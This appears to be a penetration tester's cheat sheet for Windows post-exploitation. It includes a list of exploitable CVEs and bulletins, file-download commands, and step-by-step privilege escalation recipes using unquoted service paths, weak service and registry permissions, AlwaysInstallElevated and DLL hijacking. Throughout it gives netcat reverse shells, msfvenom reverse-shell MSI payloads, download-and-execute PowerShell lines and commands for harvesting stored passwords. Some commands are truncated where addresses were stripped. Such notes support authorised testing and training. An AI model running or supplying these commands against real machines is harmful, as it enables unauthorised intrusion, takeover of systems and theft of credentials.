e81fe00 // cmd.exe

Ping test blind rce

C:\Windows\System32\cmd.exe /c ping
# on linux box: 
tcpdump -i tun0 icmp

Ping test blind rce like above check if x64 powershell exists

C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe ping

Download files

certutil.exe -urlcache -split -f C:\\Users\\Public\\nc64.exe

powershell -c "(new-object System.Net.WebClient).DownloadFile('http:/

powershell iwr -uri -outfile ch.exe # also works in PS ConstrainLanguageMode

expand C:\\Users\\Public\\watson.exe

bitsadmin /transfer debjob /download /priority normal C:\Users\\Public\watson.exe


certutil.exe -hashfile Taihou64.exe MD5

Alternate Data streams

dir /R file.txt - to check 
expand hm.txt:root.txt root.txt
powershell -command " Get-Content C:\ADS\1.txt -Stream file.exe -Raw"

List directory permissions (win server 2003)

icacls c:\*. /C

List alternate data stream files

dir /r

Mount windows account share using cifs, “ACCT here is account share name”

sudo mount -t cifs -o username=Finance // /mnt/win_share/

Mount vhd file from share

sudo guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector -ro -v /path/to/mount/directory

Dump password policy to prepare wordlist for password spray if smb null authentication allows domain enumeration.

crackmapexec smb --pass-pol -u '' -p ''

Check account lock policy before password spraying smb

crackmapexec smb --pass-pol

Windows Exploits



#Security Bulletin   #KB     #Description    #Operating System

  • CVE-2020-0787 [Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability] (Windows 7/8/10, 2008/2012/2016/2019)
  • CVE-2020-0796 [A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka ‘Windows SMBv3 Client/Server Remote Code Execution Vulnerability’] (Windows 1903/1909)
  • CVE-2019-1458 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory] (Windows 7/8/10/2008/2012/2016)
  • CVE-2019-0803 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory] (Windows 7/8/10/2008/2012/2016/2019)
  • CVE-2018-8639 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory] (Windows 7/8/10/2008/2012/2016)
  • CVE-2018-1038 [Windows Kernel Elevation of Privilege Vulnerability] (Windows 7 SP1/Windows Server 2008 R2 SP1)
  • CVE-2018-0743 [Windows Subsystem for Linux Elevation of Privilege Vulnerability] (Windows 10 version 1703/Windows 10 version 1709/Windows Server version 1709)
  • CVE-2018-8453 [An elevation of privilege vulnerability in Windows Win32k component] (>= windows 8.1)
  • CVE-2018-8440 [Windows ALPC Elevation of Privilege Vulnerability] (windows 7/8.1/10/2008/2012/2016)
  • MS17-017  [KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (windows 7/8)
  • CVE-2017-8464  [LNK Remote Code Execution Vulnerability]  (windows 10/8.1/7/2016/2010/2008)
  • CVE-2017-0213  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008)
  • CVE-2018-0833 [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
  • CVE-2018-8120 [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
  • MS17-010  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP)
  • MS16-135  [KB3199135]  [Windows Kernel Mode Drivers]  (2016)
  • MS16-111  [KB3186973]  [kernel api]  (Windows 10 10586 (32/64)/8.1)
  • MS16-098  [KB3178466]  [Kernel Driver]  (Win 8.1)
  • MS16-075  [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012)
  • MS16-034  [KB3143145]  [Kernel Driver]  (2008/7/8/10/2012)
  • MS16-032  [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012)
  • MS16-016  [KB3136041]  [WebDAV]  (2008/Vista/7)
  • MS16-014  [K3134228]  [remote code execution]  (2008/Vista/7)
  • MS15-097  [KB3089656]  [remote code execution]  (win8.1/2012)
  • MS15-076  [KB3067505]  [RPC]  (2003/2008/7/8/2012)
  • MS15-077  [KB3077657]  [ATM]  (XP/Vista/Win7/Win8/2000/2003/2008/2012)
  • MS15-061  [KB3057839]  [Kernel Driver]  (2003/2008/7/8/2012)
  • MS15-051  [KB3057191]  [Windows Kernel Mode Drivers]  (2003/2008/7/8/2012)
  • MS15-015  [KB3031432]  [Kernel Driver]  (Win7/8/8.1/2012/RT/2012 R2/2008 R2)
  • MS15-010  [KB3036220]  [Kernel Driver]  (2003/2008/7/8)
  • MS15-001  [KB3023266]  [Kernel Driver]  (2008/2012/7/8)
  • MS14-070  [KB2989935]  [Kernel Driver]  (2003)
  • MS14-068  [KB3011780]  [Domain Privilege Escalation]  (2003/2008/2012/7/8)
  • MS14-058  [KB3000061]  [Win32k.sys]  (2003/2008/2012/7/8)
  • MS14-066  [KB2992611]  [Windows Schannel Allowing remote code execution] (VistaSP2/7 SP1/8/Windows 8.1/2003 SP2/2008 SP2/2008 R2 SP1/2012/2012 R2/Windows RT/Windows RT 8.1)
  • MS14-040  [KB2975684]  [AFD Driver]  (2003/2008/2012/7/8)
  • MS14-002  [KB2914368]  [NDProxy]  (2003/XP)
  • MS13-053  [KB2850851]  [win32k.sys]  (XP/Vista/2003/2008/win 7)
  • MS13-046  [KB2840221]  [dxgkrnl.sys]  (Vista/2003/2008/2012/7)
  • MS13-005  [KB2778930]  [Kernel Mode Driver]  (2003/2008/2012/win7/8)
  • MS12-042  [KB2972621]  [Service Bus]  (2008/2012/win7)
  • MS12-020  [KB2671387]  [RDP]  (2003/2008/7/XP)
  • MS11-080  [KB2592799]  [AFD.sys]  (2003/XP)
  • MS11-062  [KB2566454]  [NDISTAPI]  (2003/XP)
  • MS11-046  [KB2503665]  [AFD.sys]  (2003/2008/7/XP)
  • MS11-011  [KB2393802]  [kernel Driver]  (2003/2008/7/XP/Vista)
  • MS10-092  [KB2305420]  [Task Scheduler]  (2008/7)
  • MS10-065  [KB2267960]  [FastCGI]  (IIS 5.1, 6.0, 7.0, and 7.5)
  • MS10-059  [KB982799]   [ACL-Churraskito]  (2008/7/Vista)
  • MS10-048  [KB2160329]  [win32k.sys]  (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)
  • MS10-015  [KB977165]   [KiTrap0D]  (2003/2008/7/XP)
  • MS10-012  [KB971468]  [SMB Client Trans2 stack overflow]  (Windows 7/2008R2)
  • MS09-050  [KB975517]   [Remote Code Execution]  (2008/Vista)
  • MS09-020  [KB970483]   [IIS 6.0]  (IIS 5.1 and 6.0)
  • MS09-012  [KB959454]   [Chimichurri]  (Vista/win7/2008/Vista)
  • MS08-068  [KB957097]   [Remote Code Execution]  (2000/XP)
  • MS08-067  [KB958644]   [Remote Code Execution]  (Windows 2000/XP/Server 2003/Vista/Server 2008)
  • MS08-066  [KB956803]   [AFD.sys]  (Windows 2000/XP/Server 2003)
  • MS08-025  [KB941693]   [Win32.sys]  (XP/2003/2008/Vista)
  • MS06-040  [KB921883]   [Remote Code Execution]  (2003/xp/2000)
  • MS05-039  [KB899588]   [PnP Service]  (Win 9X/ME/NT/2000/XP/2003)
  • MS03-026  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003)

Windows Privesc

Windows Privilege Escalation

Check OS, Patch level, Basic

Systeminfo | findstr /B /C:"OS Name" /C:"System Type"  etc .. 
## Updates
wmic qfe get Caption,Description,HotFixID,InstalledOn
Wmic logicaldisk get caption,description 

wmic product get name, version, vendor
accesschk.exe -uws "Everyone" "C:\Program Files"
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

sc query state=all | findstr "SERVICE_NAME:"
wmic service get name,displayname,pathname,startmode 
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

## Volume

## Drivers - in powershell
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

echo %USERNAME%  

whoami /priv
whoami /groups 
whoami /all
# If user has SeImpersonate privs 
# \\\test\juicy.exe -l 4444 -p c:\windows\system32\cmd.exe -a "/c  \\\test\nc.exe -e cmd.exe 4447" -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9} 

net user  
net localgroup  
net user /domain  
net group /domain  
net group /domain <Group Name> 

Firewall / AV / Defender

netsh firewall show state  
netsh firewall show config  
Sc query windefend
Netsh advfirewall firewall dump, netsh firewall show state


ipconfig /all  
route print  
arp -A 

Checklist automated tools

Run winpeas 
Run PowerUp.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-AllChecks"

Run Sherlock.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Find-AllVulns"

accesschk.exe /accepteula -wvu
Folder Perms 
\\\test\accesschk.exe /accepteula -uwdqs "Authenticated Users" C:\
\\\test\accesschk.exe /accepteula -uwdqs "Everyone" C:\
File Perms 
\\\test\accesschk.exe /accepteula -uwqs  "Authenticated Users" C:\*.*
\\\test\accesschk.exe /accepteula -uwdqs "Everyone" C:\*.*


# Executables  
WinPEAS.exe /.bat * 
Watson.exe * 
windows-privesc-check2.exe --dump -G

Sherlock.ps1 * 
PowerUp.ps1 * 
jaws-enumps1 * 

Windows-exploit-suggester.py *
Systeminfo -> a text file and run it with windows exploit suggester.py, search for exploit in SecWiki github 

MSF exploit suggester *
In a meterpreter session – run /post/multi/recon/local_exploit_suggester - > shows list of kernel

Installed applications and services

#running processes to started services 
tasklist /SVC
#Windows services thatare started
net start
#Look for 3rd party drivers 

#Check if WMIC is allowd on low pirv shell. Mostly allowed on Win7 /win8 
 wmic /?
Automated WMIC info - https://www.fuzzysecurity.com/tutorials/files/wmic_info.rar 
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

#Check directory permissions 
cacls "C:\Python27"

Scheduled Tasks

schtasks /query /fo LIST /v  # Copy to schtasks.txt on local and run 
-> cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM  

dir %SystemRoot%\Tasks  

e.g. c:\windows\tasks\  
e.g. c:\windows\system32\tasks\  

# If we have write permissions on the  scheduleded taks binary / binary dir 
accesschk.exe -dqv "E:\GrabLogs"
copy evil-tftp.exe E:\GrabLogs\tftp.exe

Startups and autoruns

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

Check access on the files and dir using accesschk , if writebale , we can write malicuis binary 
accesschk64.exe /accepteula -wvu "C:\Program Files\Autorun Program"

Service Permissions

Check if service config can be modified

accesschk.exe /accepteula  
accesschk.exe -uwcqv "Authenticated Users" * /accepteula  
accesschk.exe -ucqv \<Service Name>  

sc qc \<Service Name>  #  Get service details 

Check service with weak file permission

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"  

sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt  
FOR /F %i in (Servicenames.txt) DO echo %i  
type Servicenames.txt  
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt  
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

Unquoted Service Path

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """  

sc query  
sc qc service name 

AlwaysInstallElevated << IF 64 bits use: %SystemRoot%\Sysnative\reg.exe

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\

Check for AlwaysInstallElevated = 1 , if yes create a msfvenom msi payload 
msfvenom -p windows/shell_reverse_tcp lhost= lport= -f msi -o setup.msi
msiexec /quiet /qn /i C:\Temp\setup.msi

Service only available from inside

netstat -ano  
upload plink.exe  
plink.exe -R "remote port":"local port"  root@"ipaddress"

Pasword in files

Check for savecred

cmdkey /list        << If there are entries, it means that we may able to runas certain user who stored his cred in windows  
runas /savecred /user:ACCESS\Administrator "c:\windows\system32\cmd.exe /c \\IP\share\nc.exe -nv 80 -e cmd.exe" 

Can we find any SAM files?


findstr /si password *.txt  
findstr /si password *.xml  
findstr /si password *.ini  
Findstr /si password *.config 
findstr /si pass/pwd *.ini  

dir /s *pass* == *cred* == *vnc* == *.config*  

in all files  
findstr /spin "password" *.*  
findstr /spin "password" *.*  

Unattended config


dir /b /s unattend.xml  
dir /b /s web.config  
dir /b /s sysprep.inf  
dir /b /s sysprep.xml  
dir /b /s *pass*  

dir c:\*vnc.ini /s /b  
dir c:\*ultravnc.ini /s /b   
dir c:\ /s /b | findstr /si *vnc.ini 


### VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"  
reg query "HKCU\Software\TightVNC\Server"  

### Windows autologin  
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"  
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"  

### SNMP Paramters  
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"  

### Putty  
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"  

### Search for password in registry  
reg query HKLM /f password /t REG_SZ /s  
reg query HKCU /f password /t REG_SZ /s 


Check for registry services 
> Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
Look for access group permissions for NT AUTH/Interactive 

Create a new window service binary, check attack directory for source (net user add works) 
> x86_64-w64-mingw32-gcc windows_service.c -o x.exe

Add to the registry path 
> reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
Execute using 
> sc start regsvc 

Unquoted Service Path Exploitation

## Case 1, SeShutdownPrivilege is listed when checked whoami /priv # doesn't matter even if it shows Disabled

# Search for services that auto start:
wmic service get name,displayname,pathname,startmode | findstr /i "auto"
# Search for non-standard services
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows"
# Potential unquoted service output example
Heisenburg Service   heisenburgsvc     "C:\Program Files\Heisenburg\The One Who\knocks.exe"        auto

# next check if W or F permission exists for BUILTIN\Users or Everyone on one of the sub directory
icacls "C:\\"                         # or: .\accesschk.exe /accepteula -uwdq C:\
icacls "C:\Program Files"             # or: .\accesschk.exe /accepteula -uwdq "C:\Program Files"
icacls "C:\Program Files\Heisenburg"  # or  .\accesschk.exe /accepteula -uwdq "C:\Program Files\Heisenburg"

# Example output if (builtin\users or EVERYONE) has ( (I) or (F) ) on "C:\Program Files\Heisenburg":
#                  BUILTIN\Users:(F)
#                  BUILTIN\Users:(I)(RX) 
# Example output for accesschk.exe:

# Create reverse shell binary and copy it accordingly
copy %temp%\backdoor.exe "C:\Program Files\Heisenburg\The.exe" 

# now reboot to have the service auto start 
shutdown /r /t 0

## Case 2, SeShutdownPrivilege = Disabled, we have (service_stop,service_start) privilege on a service

# Search for services that has manual start mode and non-standard
wmic service get name,displayname,pathname,startmode | findstr /i "manual" | findstr /i /v "c:\windows"
# Potential unquoted service output example
Heisenburg Service   heisenburgsvc     "C:\Program Files\Heisenburg\The One Who\knocks.exe"        manual

# Check if we have service_stop, service_start privilege
.\accesschk.exe /accepteula -ucqv user heisenburgsvc

# next check if W or F permission exists for BUILTIN\Users or Everyone on one of the sub directory
icacls "C:\\"                         # or: .\accesschk.exe /accepteula -uwdq C:\
icacls "C:\Program Files"             # or: .\accesschk.exe /accepteula -uwdq "C:\Program Files"
icacls "C:\Program Files\Heisenburg"  # or  .\accesschk.exe /accepteula -uwdq "C:\Program Files\Heisenburg"

# Example output if (builtin\users or EVERYONE) has ( (I) or (F) ) on "C:\Program Files\Heisenburg":
#                  BUILTIN\Users:(F)
#                  BUILTIN\Users:(I)(RX) 
# Example output for accesschk.exe:

# Since there is spaces between "\The One Who\" on the path
# Windows will look for "\The.exe" first, then "\The One.exe", then "\The One Who.exe", and finally "\The One Who\knocks.exe"

# Create reverse shell binary and copy it accordingly

copy %temp%\backdoor.exe "C:\Program Files\Heisenburg\The.exe" 

# Start netcat listener to catch the reverse shell and start the service
net start heisenburgsvc # net stop heisenburgsvc first if the service is already running.

Weak service permissions Exploitation

# download accesschk.exe form here https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
# List access for all services
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" * # or: .\accesschk.exe /accepteula -uwcqv user *
# Example Output, have full access in two services:
# $ RW upnphost

# at least (service_change_config, service_start, service_stop) access is needed, service_all_access = full access

# If both conditions are met we can start exploiting this now.

# List current config for the service
sc qc upnphost
# see if START TYPE is DEMAND_START and if SERVICE_START_NAME is higher privileged
# $        START_TYPE         : 3   DEMAND_START
# ...
# ... 
# $        SERVICE_START_NAME : NT AUTHORITY\LocalService 
# change binpath with the payload you want to execute, example rev shell with uploaded nc.exe:
sc config "upnphost" binpath= "C:\WINDOWS\Temp\nc.exe 443 -e C:\WINDOWS\System32\cmd.exe"
# remove dependencies (if any)
sc config "upnphost" depend= ""
# make it run from system account
sc config "upnphost" obj= ".\LocalSystem" password= ""
# Start netcat listener to catch the reverse shell and start the service
net start "upnphost" # net stop "upnphost" first if the service is already running.

Weak Registry Permissions Exploitation

# Check permissions for an example service "upnphost"
Get-Acl HKLM:\System\CurrentControlSet\Services\upnphost | Format-List # PowerShell
# Example output, Check if NT AUTHORITY\INTERACTIVE has Full Control
# Access : Everyone Allow  ReadKey
#          NT AUTHORITY\INTERACTIVE Allow  FullControl
#          NT AUTHORITY\SYSTEM Allow  FullControl 
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\upnphost # same thing accesschk
# Example output for accesschk.exe:
#         KEY_ALL_ACCESS

# Check if we have service_stop, service_start privilege
.\accesschk.exe /accepteula -ucqv user upnphost

# If both conditions are met we can start exploiting this now.

# list current values of the service
reg query HKLM\System\CurrentControlSet\Services\upnphost
# example output:
# HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\upnphost
#     DisplayName    REG_SZ    @%systemroot%\system32\upnphost.dll,-213
#     ErrorControl    REG_DWORD    0x1
#     ImagePath    REG_EXPAND_SZ    %SystemRoot%\system32\svchost.exe -k LocalServiceAndNoImpersonation
#     ...

# update ImagePath to point to our reverse shell payload
reg add HKLM\System\CurrentControlSet\Services\upnphost /v ImagePath /t REG_EXPAND_SZ /d C:\Windows\Temp\backdoor.exe /f
# Start netcat listener to catch the reverse shell and start the service
net start "upnphost" # net stop "upnphost" first if the service is already running.

Weak Service Executable File Permissions Exploitation

# verifying we can overwrite and existing service binary file 
icacls "C:\Program Files\Heisenburg\knocks.exe"  # or .\accesschk.exe /accepteula -uvwq "C:\Program Files\Heisenburg\knocks.exe"

# Example output if (builtin\users or EVERYONE) has ( (I) or (F) ) on "C:\Program Files\Heisenburg":
#                  Everyone:(F)
#                  BUILTIN\Users:(I)(RX) 
# Example output for accesschk.exe:

# backup original executable
copy "C:\Program Files\Heisenburg\knocks.exe"  C:\Temp\

# Create reverse shell binary and overwrite the existing one
copy /Y C:\Temp\backdoor.exe "C:\Program Files\Heisenburg\knocks.exe" 
# Start netcat listener to catch the reverse shell and start the service
net start "heisenburgsvc" # net stop "heisenburgsvc" first if the service is already running.

AlwaysInstallElevated privilege Escalation

# This will only work if both registry keys contain "AlwaysInstallElevated" value 0x1.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# if the conditions are met we can exploit this now

# generate reverse shell msi payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<MY-IP> LPORT=<MY-PORT> -f msi -o shell.msi

# copy the binary over to target, start a listener and exec
msiexec /quiet /qn /i C:\Temp\shell.msi

DLL hijacking

You can see the DLL search order on 32-bit systems below:
1 - The directory from which the application loaded
2 - 32-bit System directory (C:\Windows\System32)
3 - 16-bit System directory (C:\Windows\System)
4 - Windows directory (C:\Windows)
5 - The current working directory (CWD)
6 - Directories in the PATH environment variable (system then user)
As a low privilege user we have little hope of putting a malicious DLL in 1-4, 5 is not a possibility in this case because we are talking about a Windows service but if we have write access to any of the directories in the Windows PATH we win.
echo %path%
# We can check our access permissions with accesschk or cacls
accesschk.exe -dqv "C:\Python27"
cacls "C:\Python27"
# Before we go over to action we need to check the status of the IKEEXT service. In this case we can see it is set to "AUTO_START" so it will launch on boot!
sc qc IKEEXT
copy evil.dll C:\Python27\wlbsctrl.dll

Stored credentials

cmdkey /list

# if saved creds exist use runas to execute as that user
runas /savedcred /user:<USERNAME-OF-SAVED-CRED> C:\Temp\backdoor.exe

Get passwords from windows registry

# autologon creds
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

reg query "HKCU\Software\ORL\WinVNC3\Password"

# SNMP Paramters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

Search for password in registry

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Files that may contain passwords

# sysbol policy files containing cPassword on a domain controller; 
# general locations: %SYSTEMROOT%\SYSVOL\sysvol 
# \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\
Services\Services.xml: Element-Specific Attributes
ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element
Printers\Printers.xml: SharedPrinter Element
Drives\Drives.xml: Element-Specific Attributes
DataSources\DataSources.xml: Element-Specific Attributes

Find all weak folder permissions per drive.

accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\

Find all weak file permissions per drive.

accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*